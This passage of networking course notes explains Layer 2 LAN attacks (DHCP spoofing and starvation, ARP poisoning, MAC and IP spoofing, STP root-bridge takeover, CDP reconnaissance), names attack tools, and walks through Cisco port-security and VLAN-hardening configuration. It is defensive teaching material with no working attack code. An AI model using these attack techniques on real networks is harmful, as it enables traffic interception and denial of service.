Gobbler has the ability to look at the entire scope of leasable IP addresses and tries to lease them all.
Specifically, it creates DHCP discovery messages with bogus MAC addresses.

23
DHCP Spoofing Attack

A DHCP spoofing attack occurs when a rogue DHCP server is connected to the network and provides false IP
configuration parameters to legitimate clients. A rogue server can provide a variety of misleading information:

• Wrong default gateway - The rogue server provides an invalid gateway or the IP address of its host to
create a man-in-the-middle attack. This may go entirely undetected as the intruder intercepts the data flow
through the network.
• Wrong DNS server - The rogue server provides an incorrect DNS server address pointing the user to a
nefarious website.
• Wrong IP address - The rogue server provides an invalid IP address effectively creating a DoS attack on
the DHCP client.

Explanation of a DHCP spoofing attack.

Step 1 Threat Actor Connects Rogue DHCP Server

A threat actor successfully connects a rogue DHCP server to a switch port on the same subnet and VLANs as
the target clients. The goal of the rogue server is to provide clients with false IP configuration information.

Step 2 Client Broadcasts DHCP Discovery Messages

A legitimate client connects to the network and requires IP configuration parameters. Therefore, the client
broadcasts a DHCP Discovery request looking for a response from a DHCP server. Both servers will receive
the message and respond.

24
Step 3 Legitimate and Rogue DHCP Reply
The legitimate DHCP server responds with valid IP configuration parameters. However, the rogue server also
responds with a DHCP offer containing IP configuration parameters defined by the threat actor. The client will
reply to the first offer received.
The network topology consists of two multilayer switches connected to two LAN switches. A legitimate D H C
P server is connected to one of the multilayer switches. ADHCP client is connected to one of the LAN
switches. A rogue DHCP server is connected to the other LAN switch. A DHCP offer message sent by both
DHCP servers to the DHCP client.

25
Step 4 Client Accepts Rogue DHCP Offer

The rogue offer was received first, and therefore, the client broadcasts a DHCP request accepting the IP
parameters defined by the threat actor. The legitimate and rogue server will receive the request.

Step 5 Rogue Server Acknowledges

The rogue server unicasts a reply to the client to acknowledge its request. The legitimate server will cease
communicating with the client.

26
10.5.6 Video – ARP Attacks, STP Attacks, and CDP reconnaissance.

10.5.7 ARP Attacks

Recall that hosts broadcast ARP Requests to determine the MAC address of a host with a particular IPv4
address. This is typically done to discover the MAC address of the default gateway. All hosts on the subnet
receive and process the ARP Request. The host with the matching IPv4 address in the ARP Request sends
an ARP Reply.

According to the ARP RFC, a client is allowed to send an unsolicited ARP Request called a “gratuitous ARP.”
When a host sends a gratuitous ARP, other hosts on the subnet store the MAC address and IPv4 address
contained in the gratuitous ARP in their ARP tables.

The problem is that an attacker can send a gratuitous ARP message containing a spoofed MAC address to a
switch, and the switch would update its MAC table accordingly. Therefore, any host can claim to be the owner
of any IP and MAC address combination they choose. In a typical attack, a threat actor can send unsolicited
ARP Replies to other hosts on the subnet with the MAC Address of the threat actor and the IPv4 address of
the default gateway.

There are many tools available on the internet to create ARP man-in-the-middle attacks including dsniff, Cain
& Abel, ettercap, Yersinia, and others. IPv6 uses ICMPv6 Neighbor Discovery Protocol for Layer 2 address
resolution. IPv6 includes strategies to mitigate Neighbor Advertisement spoofing, similar to the way IPv6
prevents a spoofed ARP Reply.

ARP spoofing and ARP poisoning are mitigated by implementing DAI.

Explanation of ARP spoofing and ARP poisoning

Step 1– Normal State with Converged MAC Tables

Each device has an accurate MAC table with the correct IPv4 and MAC addresses for the other devices on
the LAN.

27
 Step 2 ARP Spoofing Attack

The threat actor sends two spoofed gratuitous ARP Replies in an attempt to replace R1 as the default
gateway:

1. The first one informs all devices on the LAN that the threat actor’s MAC address ([Link]) maps to R1’s
IPv4 address, [Link].
2. The second one informs all devices on the LAN that the threat actor’s MAC address ([Link]) maps to
PC1’s IPv4 address, [Link].

Step 3 ARP Poisoning Attack with Man-in-the-Middle Attack

R1 and PC1 remove the correct entry for each other’s MAC address and replace it with PC2’s MAC address.
The threat actor has now poisoned the ARP caches of all devices on the subnet. ARP poisoning leads to
various man-in-the-middle attacks, posing a serious security threat to the network.

28
10.5.8 Address Spoofing Attack

IP addresses and MAC addresses can be spoofed for a variety of reasons. IP address spoofing is when a
threat actor hijacks a valid IP address of another device on the subnet, or uses a random IP address. IP
address spoofing is difficult to mitigate, especially when it is used inside a subnet in which the IP belongs.

MAC address spoofing attacks occur when the threat actors alter the MAC address of their host to match
another known MAC address of a target host. The attacking host then sends a frame throughout the network
with the newly-configured MAC address. When the switch receives the frame, it examines the source MAC
address. The switch overwrites the current MAC table entry and assigns the MAC address to the new port, as
shown in the figure. It then inadvertently forwards frames destined for the target host to the attacking host.

When the target host sends traffic, the switch will correct the error, realigning the MAC address to the original
port. To stop the switch from returning the port assignment to its correct state, the threat actor can create a
program or script that will constantly send frames to the switch so that the switch maintains the incorrect or
spoofed information. There is no security mechanism at Layer 2 that allows a switch to verify the source of
MAC addresses, which is what makes it so vulnerable to spoofing.

IP and MAC address spoofing can be mitigated by implementing IPSG.

10.5.9 STP Attack

Network attackers can manipulate the Spanning Tree Protocol (STP) to conduct an attack by spoofing the root
bridge and changing the topology of a network. Attackers can make their hosts appear as root bridges; and
therefore, capture all traffic for the immediate switched domain.

To conduct an STP manipulation attack, the attacking host broadcasts STP bridge protocol data units
(BPDUs) containing configuration and topology changes that will force spanning-tree recalculations, as shown
in the figure. The BPDUs sent by the attacking host announce a lower bridge priority in an attempt to be
elected as the root bridge.

29
Note: These issues can occur when someone adds an Ethernet switch to the network without any malicious
intent.

If successful, the attacking host becomes the root bridge, as shown in the figure, and can now capture a
variety of frames that would otherwise not be accessible.

This STP attack is mitigated by implementing BPDU Guard on all access ports. BPDU Guard is discussed in
more detail later in the course

30
10.5.10 CDP Reconnaissance

The Cisco Discovery Protocol (CDP) is a proprietary Layer 2 link discovery protocol. It is enabled on all Cisco
devices by default. CDP can automatically discover other CDP-enabled devices and help auto-configure
their connection. Network administrators also use CDP to help configure and troubleshoot network devices.

CDP information is sent out CDP-enabled ports in a periodic, unencrypted multicast. CDP information
includes the IP address of the device, IOS software version, platform, capabilities, and the native VLAN.
The device receiving the CDP message updates its CDP database.

CDP information is extremely useful in network troubleshooting. For example, CDP can be used to verify
Layer 1 and 2 connectivity. If an administrator cannot ping a directly connected interface, but still receives
CDP information, then the problem is most likely related to the Layer 3 configuration.

However, the information provided by CDP can also be used by a threat actor to discover network
infrastructure vulnerabilities.

In the figure, a sample Wireshark capture displays the contents of a CDP packet. The attacker is able to
identify the Cisco IOS software version used by the device. This allows the attacker to determine whether
there were any security vulnerabilities specific to that particular version of IOS.

CDP broadcasts are sent unencrypted and unauthenticated. Therefore, an attacker could interfere with the
network infrastructure by sending crafted CDP frames containing bogus device information to directly-
connected Cisco devices.

To mitigate the exploitation of CDP, limit the use of CDP on devices or ports. For example, disable CDP on
edge ports that connect to untrusted devices.

31
To disable CDP globally on a device, use the no cdp run global configuration mode command. To enable
CDP globally, use the cdp run global configuration command.

To disable CDP on a port, use the no cdp enable interface configuration command. To enable CDP on a port,
use the cdp enable interface configuration command.

Note: Link Layer Discovery Protocol (LLDP) is also vulnerable to reconnaissance attacks. Configure no lldp
run to disable LLDP globally. To disable LLDP on the interface, configure no lldp transmit and no lldp
receive.

10.5.11 Check Your Understanding – LAN Attacks

32
33
10.6 Module Practice and Quiz

10.6.1 What did I learn in this module?

Endpoints are particularly susceptible to malware-related attacks that originate through email or web browsing,
such as DDOS, date breaches, and malware. These endpoints have typically used traditional host-based
security features, such as antivirus/antimalware, host-based firewalls, and Host-based intrusion prevention
systems (HIPSs). Endpoints are best protected by a combination of NAC, host-based AMP software, an
email security appliance (ESA), and a web security appliance (WSA). Cisco WSA can perform blacklisting of
URLs, URL-filtering, malware scanning, URL categorization, Web application filtering, and encryption and
decryption of web traffic.

AAA controls who is permitted to access a network (authenticate), what they can do while they are there
(authorize), and to audit what actions they performed while accessing the network (accounting). Authorization
uses a set of attributes that describes the user’s access to the network. Accounting is combined with AAA
authentication. The AAA server keeps a detailed log of exactly what the authenticated user does on the
device. The IEEE 802.1X standard is a port-based access control and authentication protocol that restricts
unauthorized workstations from connecting to a LAN through publicly accessible switch ports.

If Layer 2 is compromised, then all layers above it are also affected. The first step in mitigating attacks on the
Layer 2 infrastructure is to understand the underlying operation of Layer 2 and the Layer 2 solutions: Port
Security, DHCP Snooping, DAI, and IPSG. These won’t work unless management protocols are secured.

MAC address flooding attacks bombard the switch with fake source MAC addresses until the switch MAC
address table is full. At this point, the switch treats the frame as an unknown unicast and begins to flood all
incoming traffic out all ports on the same VLAN without referencing the MAC table. The threat actor can now
capture all of the frames sent from one host to another on the local LAN or local VLAN. The threat actor
uses macof to rapidly generate many random source and destination MAC and IP. To mitigate MAC table
overflow attacks, network administrators must implement port security.

A VLAN hopping attack enables traffic from one VLAN to be seen by another VLAN without the aid of a
router. The threat actor configures a host to act like a switch to take advantage of the automatic trunking
port feature enabled by default on most switch ports.

A VLAN double-tagging attack is unidirectional and works only when the threat actor is connected to a port
residing in the same VLAN as the native VLAN of the trunk port. Double tagging allows the threat actor to
send data to hosts or servers on a VLAN that otherwise would be blocked by some type of access control
configuration. Return traffic will also be permitted, letting the threat actor communicate with devices on the
normally blocked VLAN.

VLAN hopping and VLAN double-tagging attacks can be prevented by implementing the following trunk
security guidelines:

• Disable trunking on all access ports.

• Disable auto trunking on trunk links so that trunks must be manually enabled.
• Be sure that the native VLAN is only used for trunk links.

DHCP Attack: DHCP servers dynamically provide IP configuration information including IP address, subnet
mask, default gateway, DNS servers, and more to clients. Two types of DHCP attacks are DHCP starvation
and DHCP spoofing. Both attacks are mitigated by implementing DHCP snooping.

34
ARP Attack: A threat actor sends a gratuitous ARP message containing a spoofed MAC address to a switch,
and the switch updates its MAC table accordingly. Now the threat actor sends unsolicited ARP Requests to
other hosts on the subnet with the MAC Address of the threat actor and the IP address of the default gateway.
ARP spoofing and ARP poisoning are mitigated by implementing DAI.

Address Spoofing Attack: IP address spoofing is when a threat actor hijacks a valid IP address of another
device on the subnet or uses a random IP address. MAC address spoofing attacks occur when the threat
actors alter the MAC address of their host to match another known MAC address of a target host. IP and MAC
address spoofing can be mitigated by implementing IPSG.

STP Attack: Threat actors manipulate STP to conduct an attack by spoofing the root bridge and changing the
topology of a network. Threat actors make their hosts appear as root bridges; therefore, capturing all traffic for
the immediate switched domain. This STP attack is mitigated by implementing BPDU Guard on all access
ports

CDP Reconnaissance: CDP information is sent out CDP-enabled ports in a periodic, unencrypted multicast.
CDP information includes the IP address of the device, IOS software version, platform, capabilities, and the
native VLAN. The device receiving the CDP message updates its CDP database. the information provided by
CDP can also be used by a threat actor to discover network infrastructure vulnerabilities. To mitigate the
exploitation of CDP, limit the use of CDP on devices or ports.

10.6.2 Module Quiz – LAN security Concepts

35
36
37
38
39
11 Switch Security Configuration .

11.0.1 Why Should I take this module?

Welcome to Switch Security Configuration!

An important part of your responsibility as a network professional is to keep the network secure. Most of the
time we only think about security attacks coming from outside the network, but threats can come from within
the network as well. These threats can range anywhere from an employee innocently adding an Ethernet
switch to the corporate network so they can have more ports, to malicious attacks caused by a disgruntled
employee. It is your job to keep the network safe and ensuring that business operations continue
uncompromised.

How do we keep the network safe and stable? How do we protect it from malicious attacks from within the
network? How do we make sure employees are not adding switches, servers and other devices to the network
that might compromise network operations?

This module is your introduction to keeping your network secure from within!

11.0.2 What Will I learn in this module?

Module Title: Switch Security Configuration

Module Objective: Configure switch security to mitigate LAN attacks.

Topic Title Topic Objective

Implement Port
Implement port security to mitigate MAC address table attacks.
Security

Mitigate VLAN Explain how to configure DTP (Dynamic Trunking Protocol)and native VLAN
Attacks to mitigate VLAN attacks.

Mitigate DHCP
Explain how to configure DHCP snooping to mitigate DHCP attacks.
Attacks

Mitigate ARP
Explain how to configure ARP inspection to mitigate ARP attacks.
Attacks

Mitigate STP
Explain how to configure PortFast and BPDU Guard to mitigate STP attacks.
Attacks

11.1 Implement Port Security

11.1.1 Secure unused ports

Layer 2 devices are considered to be the weakest link in a company’s security infrastructure. Layer 2 attacks
are some of the easiest for hackers to deploy but these threats can also be mitigated with some common
Layer 2 solutions.

40
All switch ports (interfaces) should be secured before the switch is deployed for production use. How a port is
secured depends on its function.
A simple method that many administrators use to help secure the network from unauthorized access is to
disable all unused ports on a switch. For example, if a Catalyst 2960 switch has 24 ports and there are three
Fast Ethernet connections in use, it is good practice to disable the 21 unused ports. Navigate to each unused
port and issue the Cisco IOS shutdown command. If a port must be reactivated at a later time, it can be
enabled with the no shutdown command.
To configure a range of ports, use the interface range command.

Switch(config)# interface range type module/first-number – last-number

For example, to shutdown ports for Fa0/8 through Fa0/24 on S1, you would enter the following command.

S1(config)# interface range fa0/8 - 24

S1(config-if-range)# shutdown
%LINK-5-CHANGED: Interface FastEthernet0/8, changed state to administratively
down
(output omitted)
%LINK-5-CHANGED: Interface FastEthernet0/24, changed state to administratively
down
S1(config-if-range)#

11.1.2 Mitigate MAC Address Table Attacks

The simplest and most effective method to prevent MAC address table overflow attacks is to enable port
security.
Port security limits the number of valid MAC addresses allowed on a port. It allows an administrator to
manually configure MAC addresses for a port or to permit the switch to dynamically learn a limited number of
MAC addresses. When a port configured with port security receives a frame, the source MAC address of the
frame is compared to the list of secure source MAC addresses that were manually configured or dynamically
learned on the port.
By limiting the number of permitted MAC addresses on a port to one, port security can be used to control
unauthorized access to the network, as shown in the figure.

Note: MAC address is shown as 24 bits for simplicity.

41
11.1.3 Enable Port Security

Notice in the example, the switchport port-security command was rejected. This is because port security can
only be configured on manually configured access ports or manually configured trunk ports. By default, Layer
2 switch ports are set to dynamic auto (trunking on). Therefore, in the example, the port is configured with
the switchport mode access interface configuration command.
Note: Trunk port security is beyond the scope of this course.

S1(config)# interface f0/1

S1(config-if)# switchport port-security
Command rejected: FastEthernet0/1 is a dynamic port.
S1(config-if)# switchport mode access
S1(config-if)# switchport port-security
S1(config-if)# end
S1#

Use the show port-security interface command to display the current port security settings for FastEthernet
0/1, as shown in the example. Notice how port security is enabled, port status is Secure-down which means
there are no devices attached and no violation has occurred, the violation mode is Shutdown, and how the
maximum number of MAC addresses is 1. If a device is connected to the port, the switch port status would
display Secure-up and the switch will automatically add the device’s MAC address as a secure MAC. In this
example, no device is connected to the port.

S1# show port-security interface f0/1

Port Security : Enabled
Port Status : Secure-down
Violation Mode : Shutdown
Aging Time : 0 mins
Aging Type : Absolute
SecureStatic Address Aging : Disabled
Maximum MAC Addresses : 1
Total MAC Addresses : 0
Configured MAC Addresses : 0
Sticky MAC Addresses : 0
Last Source Address:Vlan : 0000.0000.0000:0
Security Violation Count : 0
S1#

Note: If an active port is configured with the switchport port-security command and more than one device is
connected to that port, the port will transition to the error-disabled state. This condition is discussed later in
this topic.

After port security is enabled, other port security specifics can be configured, as shown in the example.

42
11.1.4 Limit and Learn MAC Addresses

To set the maximum number of MAC addresses allowed on a port, use the following command:

Switch(config-if)# switchport port-security maximum value

The default port security value is 1. The maximum number of secure MAC addresses that can be configured
depends the switch and the IOS. In this example, the maximum is 8192.

S1(config)# interface f0/1

S1(config-if)# switchport port-security maximum ?

<1-8192> Maximum addresses

S1(config-if)# switchport port-security maximum

The switch can be configured to learn about MAC addresses on a secure port in one of three ways:

1. Manually Configured

The administrator manually configures a static MAC address(es) by using the following command for each
secure MAC address on the port:

Switch(config-if)# switchport port-security mac-address mac-address

2. Dynamically Learned

When the switchport port-security command is entered, the current source MAC for the device connected to
the port is automatically secured but is not added to the startup configuration. If the switch is rebooted, the
port will have to re-learn the device’s MAC address.

3. Dynamically Learned – Sticky

The administrator can enable the switch to dynamically learn the MAC address and “stick” them to the running
configuration by using the following command:

Switch(config-if)# switchport port-security mac-address sticky

Saving the running configuration will commit the dynamically learned MAC address to NVRAM.

The following example demonstrates a complete port security configuration for FastEthernet 0/1 with a host
connected to port Fa0/1. The administrator specifies a maximum of 2 MAC addresses, manually configures
one secure MAC address, and then configures the port to dynamically learn additional secure MAC addresses
up to the 2 secure MAC address maximum. Use the show port-security interface and the show port-
security address command to verify the configuration.

43
*Mar 1 [Link].179: %LINK-3-UPDOWN: Interface FastEthernet0/1, changed state to
up
*Mar 1 [Link].194: %LINEPROTO-5-UPDOWN: Line protocol on Interface
FastEthernet0/1, changed state to up
S1#conf t
Enter configuration commands, one per line. End with CNTL/Z.
S1(config)#
S1(config)# interface fa0/1
S1(config-if)# switchport mode access
S1(config-if)# switchport port-security
S1(config-if)# switchport port-security maximum 2
S1(config-if)# switchport port-security mac-address [Link].1234
S1(config-if)# switchport port-security mac-address sticky
S1(config-if)# end
S1# show port-security interface fa0/1
Port Security : Enabled
Port Status : Secure-up
Violation Mode : Shutdown
Aging Time : 0 mins
Aging Type : Absolute
SecureStatic Address Aging : Disabled
Maximum MAC Addresses : 2
Total MAC Addresses : 2
Configured MAC Addresses : 1
Sticky MAC Addresses : 1
Last Source Address:Vlan : a41f.7272.676a:1
Security Violation Count : 0
S1# show port-security address
Secure Mac Address Table
-----------------------------------------------------------------------------
Vlan Mac Address Type Ports Remaining Age
(mins)
---- ----------- ---- ----- -------------
1 a41f.7272.676a SecureSticky Fa0/1 -
1 [Link].1234 SecureConfigured Fa0/1 -
-----------------------------------------------------------------------------
Total Addresses in System (excluding one mac per port) : 1
Max Addresses limit in System (excluding one mac per port) : 8192
S1#

The output of the show port-security interface command verifies that port security is enabled, there is a host
connected to the port (i.e., Secure-up), a total of 2 MAC addresses will be allowed, and S1 has learned one
MAC address statically and one MAC address dynamically (i.e., sticky).

The output of the show port-security address command lists the two learned MAC addresses.

11.1.5 Port Security Aging

Port security aging can be used to set the aging time for static and dynamic secure addresses on a port. Two
types of aging are supported per port:

> Absolute - The secure addresses on the port are deleted after the specified aging time.

44
> Inactivity - The secure addresses on the port are deleted only if they are inactive for the specified aging
time.

Use aging to remove secure MAC addresses on a secure port without manually deleting the existing secure
MAC addresses. Aging time limits can also be increased to ensure past secure MAC addresses remain, even
while new MAC addresses are added. Aging of statically configured secure addresses can be enabled or
disabled on a per-port basis.

Use the switchport port-security aging command to enable or disable static aging for the secure port, or to
set the aging time or type.

Switch(config-if)# switchport port-security aging { static | time time | type

{absolute | inactivity}}

The parameters for the command are described in the table.

Parameter Description
static Enable aging for statically configured secure addresses on this port.

time time Specify the aging time for this port. The range is 0 to 1440 minutes. If the time is 0,
aging is disabled for this port.

type absolute Set the absolute aging time. All the secure addresses on this port age out exactly
after the time (in minutes) specified and are removed from the secure address list.

type inactivity
Set the inactivity aging type. The secure addresses on this port age out only if
there is no data traffic from the secure source address for the specified time period.

Note: MAC addresses are shown as 24 bits for simplicity.

The example shows an administrator configuring the aging type to 10 minutes of inactivity and by using
the show port-security interface command to verify the configuration.

S1(config)# interface fa0/1

S1(config-if)# switchport port-security aging time 10
S1(config-if)# switchport port-security aging type inactivity
S1(config-if)# end
S1# show port-security interface fa0/1
Port Security : Enabled
Port Status : Secure-up
Violation Mode : Shutdown
Aging Time : 10 mins
Aging Type : Inactivity
SecureStatic Address Aging : Disabled
Maximum MAC Addresses : 2
Total MAC Addresses : 2
Configured MAC Addresses : 1
Sticky MAC Addresses : 1
Last Source Address:Vlan : a41f.7272.676a:1
Security Violation Count : 0
S1#

45
11.1.6 Port Security Violation Modes

If the MAC address of a device attached to the port differs from the list of secure addresses, then a port
violation occurs. By default, the port enters the error-disabled state.

To set the port security violation mode, use the following command:

Switch(config-if)# switchport port-security violation { protect | restrict |

shutdown}

The following tables show how a switch reacts based on the configured violation mode.

Security Violation Mode Descriptions

Mode Description

The port transitions to the error-disabled state immediately, turns off the port LED, and
shutdown sends a syslog message. It increments the violation counter. When a secure port is in the
(default) error-disabled state, an administrator must re-enable it by entering the shutdown and no
shutdown commands.

The port drops packets with unknown source addresses until you remove a sufficient
restrict number of secure MAC addresses to drop below the maximum value or increase the
maximum value. This mode causes the Security Violation counter to increment and
generates a syslog message.

This is the least secure of the security violation modes. The port drops packets with
protect
unknown MAC source addresses until you remove a sufficient number of secure MAC
addresses to drop below the maximum value or increase the maximum value. No syslog
message is sent.

Security Violation Mode Comparison

Discards Sends Increase Shuts

Violation Mode Offending Syslog Violation Down
Traffic Message Counter Port

Protect Yes No No No

Restrict Yes Yes Yes No

Shutdown Yes Yes Yes Yes

The following example shows an administrator changing the security violation to “restrict”. The output of
the show port-security interface command confirms that the change has been made.

S1(config)# interface f0/1

S1(config-if)# switchport port-security violation restrict
S1(config-if)# end
S1#

46
S1# show port-security interface f0/1
Port Security : Enabled
Port Status : Secure-up
Violation Mode : Restrict
Aging Time : 10 mins
Aging Type : Inactivity
SecureStatic Address Aging : Disabled
Maximum MAC Addresses : 2
Total MAC Addresses : 2
Configured MAC Addresses : 1
Sticky MAC Addresses : 1
Last Source Address:Vlan : a41f.7272.676a:1
Security Violation Count : 0
S1#

11.1.7 Ports in error- disabled State

What happens when the port security violation is shutdown and a port violation occurs? The port is physically
shutdown and placed in the error-disabled state, and no traffic is sent or received on that port.

In the figure, the port security violation is changed back to the default shutdown setting. Then the host with
MAC address a41f.7272.676a is disconnected and a new host is plugged into Fa0/1.

Notice how a series of port security related messages are generated on the console.

S1(config)# int fa0/1

S1(config-if)# switchport port-security violation shutdown
S1(config-if)# end
S1#
*Mar 1 [Link].599: %LINEPROTO-5-UPDOWN: Line protocol on Interface
FastEthernet0/1, changed state to down
*Mar 1 [Link].606: %LINK-3-UPDOWN: Interface FastEthernet0/1, changed state to
down
*Mar 1 [Link].114: %LINK-3-UPDOWN: Interface FastEthernet0/1, changed state to
up
*Mar 1 [Link].121: %LINEPROTO-5-UPDOWN: Line protocol on Interface
FastEthernet0/1, changed state to up
S1#
*Mar 1 [Link].829: %PM-4-ERR_DISABLE: psecure-violation error detected on
Fa0/1, putting Fa0/1 in err-disable state
*Mar 1 [Link].838: %PORT_SECURITY-2-PSECURE_VIOLATION: Security violation
occurred, caused by MAC address a41f.7273.018c on port FastEthernet0/1.
*Mar 1 [Link].836: %LINEPROTO-5-UPDOWN: Line protocol on Interface
FastEthernet0/1, changed state to down
*Mar 1 [Link].843: %LINK-3-UPDOWN: Interface FastEthernet0/1, changed state to
down
S1#

Note: The port protocol and link status are changed to down and the port LED is turned off.

47
In the example, the show interface command identifies the port status as err-disabled. The output of
the show port-security interface command now shows the port status as Secure-shutdown instead of
Secure-up. The Security Violation counter increments by 1.

S1# show interface fa0/1 | include down

FastEthernet0/18 is down, line protocol is down (err-disabled)
(output omitted)
S1# show port-security interface fa0/1
Port Security : Enabled
Port Status : Secure-shutdown
Violation Mode : Shutdown
Aging Time : 10 mins
Aging Type : Inactivity
SecureStatic Address Aging : Disabled
Maximum MAC Addresses : 2
Total MAC Addresses : 2
Configured MAC Addresses : 1
Sticky MAC Addresses : 1
Last Source Address:Vlan : a41f.7273.018c:1
Security Violation Count : 1
S1#

The administrator should determine what caused the security violation If an unauthorized device is connected
to a secure port, the security threat is eliminated before re-enabling the port.

In the next example, the first host is reconnected to Fa0/1. To re-enable the port, first use
the shutdown command, then, use the no shutdown command to make the port operational, as shown in the
example.

S1(config)# interface fa0/1

S1(config-if)# shutdown
S1(config-if)#
*Mar 1 [Link].981: %LINK-5-CHANGED: Interface FastEthernet0/1, changed state
to administratively down
S1(config-if)# no shutdown
S1(config-if)#
*Mar 1 [Link].275: %LINK-3-UPDOWN: Interface FastEthernet0/1, changed state to
up
*Mar 1 [Link].282: %LINEPROTO-5-UPDOWN: Line protocol on Interface
FastEthernet0/1, changed state to up
S1(config-if)#

11.1.8 Verify Port Security

After configuring port security on a switch, check each interface to verify that the port security is set correctly,
and check to ensure that the static MAC addresses have been configured correctly.

Port Security for All Interfaces

To display port security settings for the switch, use the show port-security command. The example indicates
that only one port is configured with the switchport port-security command.

48
S1# show port-security
Secure Port MaxSecureAddr CurrentAddr SecurityViolation Security Action
(Count) (Count) (Count)
---------------------------------------------------------------------------
Fa0/1 2 2 0 Shutdown
---------------------------------------------------------------------------
Total Addresses in System (excluding one mac per port) : 1
Max Addresses limit in System (excluding one mac per port) : 8192
S1#

Port Security for a Specific Interface

Use the show port-security interface command to view details for a specific interface, as shown previously
and in this example.

S1# show port-security interface fastethernet 0/1

Port Security : Enabled
Port Status : Secure-up
Violation Mode : Shutdown
Aging Time : 10 mins
Aging Type : Inactivity
SecureStatic Address Aging : Disabled
Maximum MAC Addresses : 2
Total MAC Addresses : 2
Configured MAC Addresses : 1
Sticky MAC Addresses : 1
Last Source Address:Vlan : a41f.7273.018c:1
Security Violation Count : 0
S1#

Verify Learned MAC Addresses

To verify that MAC addresses are “sticking” to the configuration, use the show run command as shown in the
example for FastEthernet 0/19.

S1# show run interface fa0/1

Building configuration...

Current configuration : 365 bytes

!
interface FastEthernet0/1
switchport mode access
switchport port-security maximum 2
switchport port-security mac-address sticky
switchport port-security mac-address sticky a41f.7272.676a
switchport port-security mac-address [Link].1234
switchport port-security aging time 10
switchport port-security aging type inactivity
switchport port-security
end

S1#

49
Verify Secure MAC Addresses

To display all secure MAC addresses that are manually configured or dynamically learned on all switch
interfaces, use the show port-security address command as shown in the example.

S1# show port-security address

Secure Mac Address Table
-----------------------------------------------------------------------------
Vlan Mac Address Type Ports Remaining Age
(mins)
---- ----------- ---- ----- -------------
1 a41f.7272.676a SecureSticky Fa0/1 -
1 [Link].1234 SecureConfigured Fa0/1 -
-----------------------------------------------------------------------------
Total Addresses in System (excluding one mac per port) : 1
Max Addresses limit in System (excluding one mac per port) : 8192
S1#

11.1.9 Syntax Checker - Implement Port Security

Implement port security for a switch interface based on the specified requirements

You are currently logged into S1. Configure FastEthernet 0/5 for port security by using the following
requirements:

> Use the interface name fa0/5 to enter interface configuration mode.
> Enable the port for access mode.
> Enable port security.
> Set the maximum number of MAC address to 3.
> Statically configure the MAC address [Link].1234.
> Configure the port to dynamically learn additional MAC addresses and dynamically add them to the
running configuration.
> Return to privileged EXEC mode.

> S1(config)#interface fa0/5

> S1(config-if)#switchport mode access
> S1(config-if)#switchport port-security
> S1(config-if)#switchport port-security maximum 3
> S1(config-if)#switchport port-security mac-address [Link].1234
> S1(config-if)#switchport port-security mac-address sticky
> S1(config-if)#end

50
Enter the command to verify port security for all interfaces.

S1#show port-security
Secure Port MaxSecureAddr CurrentAddr SecurityViolation Security Action
(Count) (Count) (Count)
---------------------------------------------------------------------------
Fa0/5 3 2 0 Shutdown
---------------------------------------------------------------------------
Total Addresses in System (excluding one mac per port) : 0
Max Addresses limit in System (excluding one mac per port) : 8192

Enter the command to verify port security on FastEthernet 0/5. Use fa0/5 for the interface name.

S1#show port-security interface fa0/5

Port Security : Enabled
Port Status : Secure-up
Violation Mode : Shutdown
Aging Time : 0 mins
Aging Type : Absolute
SecureStatic Address Aging : Disabled
Maximum MAC Addresses : 3
Total MAC Addresses : 2
Configured MAC Addresses : 1
Sticky MAC Addresses : 1
Last Source Address:Vlan : 0090.2135.6B8C:1
Security Violation Count : 0

Enter the command that will display all of the addresses to verify that the manually configured and dynamically
learned MAC addresses are in the running configuration.

S1#show port-security address

Secure Mac Address Table
-----------------------------------------------------------------------------
Vlan Mac Address Type Ports Remaining Age
(mins)
---- ----------- ---- ----- -------------
1 0090.2135.6b8c SecureSticky Fa0/5 -
1 [Link].1234 SecureConfigured Fa0/5 -
-----------------------------------------------------------------------------
Total Addresses in System (excluding one mac per port) : 0
Max Addresses limit in System (excluding one mac per port) : 8192
You have successfully configured and verified port security for the interface.

11.1.10 Packet Tracer - Implement Port Security

In this activity, you will configure and verify port security on a switch. Port security allows you to restrict a
port’s ingress traffic by limiting the MAC addresses that are allowed to send traffic into the port.

51
11.2 Mitigate VLAN Attacks

11.2.1 Mitigate VLAN Attacks Review

As a quick review, a VLAN hopping attack can be launched in one of three ways:

> Spoofing DTP messages from the attacking host to cause the switch to enter trunking mode. From here,
the attacker can send traffic tagged with the target VLAN, and the switch then delivers the packets to the
destination.
> Introducing a rogue switch and enabling trunking. The attacker can then access all the VLANs on the
victim switch from the rogue switch.
> Another type of VLAN hopping attack is a double-tagging (or double-encapsulated) attack. This attack
takes advantage of the way hardware on most switches operate.

11.2.2 Steps to Mitigate VLAN Hopping Attacks

Use the following steps to mitigate VLAN hopping attacks:

Step 1: Disable DTP (auto trunking) negotiations on non-trunking ports by using the switchport mode
access interface configuration command.

Step 2: Disable unused ports and put them in an unused VLAN.

Step 3: Manually enable the trunk link on a trunking port by using the switchport mode trunk command.

Step 4: Disable DTP (auto trunking) negotiations on trunking ports by using the switchport
nonegotiate command.

Step 5: Set the native VLAN to a VLAN other than VLAN 1 by using the switchport trunk native
vlan vlan_number command.

For example, assume the following:

> FastEthernet ports 0/1 through fa0/16 are active access ports
> FastEthernet ports 0/17 through 0/20 are not currently in use
> FastEthernet ports 0/21 through 0/24 are trunk ports.

VLAN hopping can be mitigated by implementing the following configuration.

S1(config)# interface range fa0/1 - 16

S1(config-if-range)# switchport mode access
S1(config-if-range)# exit
S1(config)#
S1(config)# interface range fa0/17 - 20
S1(config-if-range)# switchport mode access
S1(config-if-range)# switchport access vlan 1000
S1(config-if-range)# shutdown
S1(config-if-range)# exit
S1(config)#
S1(config)# interface range fa0/21 - 24
S1(config-if-range)# switchport mode trunk
S1(config-if-range)# switchport nonegotiate

52
S1(config-if-range)# switchport trunk native vlan 999
S1(config-if-range)# end
S1#

• FastEthernet ports 0/1 to 0/16 are access ports and therefore trunking is disabled by explicitly making
them access ports.
• FastEthernet ports 0/17 to 0/20 are unused ports and are disabled and assigned to an unused VLAN.
• FastEthernet ports 0/21 to 0/24 are trunk links and are manually enabled as trunks with DTP disabled.
The native VLAN is also changed from the default VLAN 1 to an unused VLAN 999.

11.2.3 Syntax Checker - Mitigate VLAN Hopping Attacks

Mitigate VLAN hopping attacks on the switch based on the specified requirements.

You are currently logged into S1. The ports status of the ports are as follows:

> FastEthernet ports 0/1 through 0/4 are used for trunking with other switches.
> FastEthernet ports 0/5 through 0/10 are unused.
> FastEthernet ports 0/11 through 0/24 are active ports currently in use.

Use range fa0/1 - 4 to enter interface configuration mode for the trunks

S1(config)#interface range fa0/1 - 4

